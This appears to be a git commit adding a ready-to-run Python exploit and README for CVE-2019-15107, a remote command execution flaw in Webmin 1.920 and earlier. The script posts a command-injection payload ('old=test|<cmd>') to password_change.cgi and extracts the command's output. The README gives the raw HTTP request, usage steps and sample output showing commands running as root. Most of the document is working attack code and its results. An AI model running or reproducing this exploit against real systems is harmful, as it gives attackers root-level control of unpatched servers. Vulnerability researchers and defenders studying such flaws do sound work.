uplaod

2025-06-20 18:00:35 +00:00 · 2019-08-23 18:51:50 +08:00 · 2019-08-23 18:51:50 +08:00 · 8cf55e9c8a
commit 8cf55e9c8a
parent 80f52196f3
4 changed files with 117 additions and 0 deletions
--- a/CVE-2019-15107/CVE-2019-15107.gif
+++ b/CVE-2019-15107/CVE-2019-15107.gif
--- a/CVE-2019-15107/CVE-2019-15107.jpg
+++ b/CVE-2019-15107/CVE-2019-15107.jpg
--- a/CVE-2019-15107/CVE_2019_15107.py
+++ b/CVE-2019-15107/CVE_2019_15107.py
@ -0,0 +1,53 @@
 import requests
 import re
 import requests.packages.urllib3
 requests.packages.urllib3.disable_warnings()
 import sys
 banner ='''
 _______           _______       _______  _______  __     _____       __    _______  __    _______  ______  
 (  ____ \|\     /|(  ____ \     / ___   )(  __   )/  \   / ___ \     /  \  (  ____ \/  \  (  __   )/ ___  \ 
 | (    \/| )   ( || (    \/     \/   )  || (  )  |\/) ) ( (   ) )    \/) ) | (    \/\/) ) | (  )  |\/   )  )
 | |      | |   | || (__             /   )| | /   |  | | ( (___) |      | | | (____    | | | | /   |    /  / 
 | |      ( (   ) )|  __)          _/   / | (/ /) |  | |  \____  |      | | (_____ \   | | | (/ /) |   /  /  
 | |       \ \_/ / | (            /   _/  |   / | |  | |       ) |      | |       ) )  | | |   / | |  /  /   
 | (____/\  \   /  | (____/\     (   (__/\|  (__) |__) (_/\____) )    __) (_/\____) )__) (_|  (__) | /  /    
 (_______/   \_/   (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/     
                          (_____)                              (_____)                                      
                                     python By jas502n
 '''
 print banner
 def CVE_2019_15107(url, cmd):
    vuln_url = url + "/password_change.cgi"
    headers = {
    'Accept-Encoding': "gzip, deflate",
    'Accept': "*/*",
    'Accept-Language': "en",
    'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
    'Connection': "close",
    'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
    'Referer': "%s/session_login.cgi"%url,
    'Content-Type': "application/x-www-form-urlencoded",
    'Content-Length': "60",
    'cache-control': "no-cache"
    } 
    payload="user=rootxx&pam=&expired=2&old=test|%s&new1=test2&new2=test2" % cmd
    r = requests.post(url=vuln_url, headers=headers, data=payload, verify=False)
    if r.status_code ==200 and "The current password is " in r.content : 
        print "\nvuln_url= %s" % vuln_url
        m = re.compile(r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
        cmd_result = m.findall(r.content)[0]
        print
        print "Command Result = %s" % cmd_result
    else:
        print "No Vuln Exit!"
 if __name__ == "__main__":
    # url = "https://10.10.20.166:10000"
    url = sys.argv[1]
    cmd = sys.argv[2]
    CVE_2019_15107(url, cmd)
--- a/CVE-2019-15107/README.md
+++ b/CVE-2019-15107/README.md
@ -0,0 +1,64 @@
 # CVE-2019-15107  Webmin RCE <=1.920
 ```
 1.  Webmin <=1.920
 2.  need enable reset Password function
 ```
 `https://10.10.20.166:10000/password_change.cgi`
 ![](./CVE-2019-15107.gif)
 ### poc
 ```
 POST /password_change.cgi HTTP/1.1
 Host: 10.10.20.166:10000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 Connection: close
 Cookie: redirect=1; testing=1; sid=x; sessiontest=1
 Referer: https://10.10.20.166:10000/session_login.cgi
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 60
 user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
 <div class="panel-body">
 <hr>
 <center><h3>Failed to change password : The current password is incorrectuid=0(root) gid=0(root) groups=0(root)
 </h3></center>
 ```
 ### python usage:
 `python CVE_2019_15107.py https://10.10.20.166:10000 cmd`
 ![](./CVE-2019-15107.jpg)
 ```
 C:\Users\CTF\Desktop>python CVE_2019_15107.py https://10.10.20.166:10000 id
 _______           _______       _______  _______  __     _____       __    _______  __    _______  ______
 (  ____ \|\     /|(  ____ \     / ___   )(  __   )/  \   / ___ \     /  \  (  ____ \/  \  (  __   )/ ___  \
 | (    \/| )   ( || (    \/     \/   )  || (  )  |\/) ) ( (   ) )    \/) ) | (    \/\/) ) | (  )  |\/   )  )
 | |      | |   | || (__             /   )| | /   |  | | ( (___) |      | | | (____    | | | | /   |    /  /
 | |      ( (   ) )|  __)          _/   / | (/ /) |  | |  \____  |      | | (_____ \   | | | (/ /) |   /  /
 | |       \ \_/ / | (            /   _/  |   / | |  | |       ) |      | |       ) )  | | |   / | |  /  /
 | (____/\  \   /  | (____/\     (   (__/\|  (__) |__) (_/\____) )    __) (_/\____) )__) (_|  (__) | /  /
 (_______/   \_/   (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/
                          (_____)                              (_____)
                                     python By jas502n
 vuln_url= https://10.10.20.166:10000/password_change.cgi
 Command Result = uid=0(root) gid=0(root) groups=0(root)
 ```
 ### 参考链接：
 https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107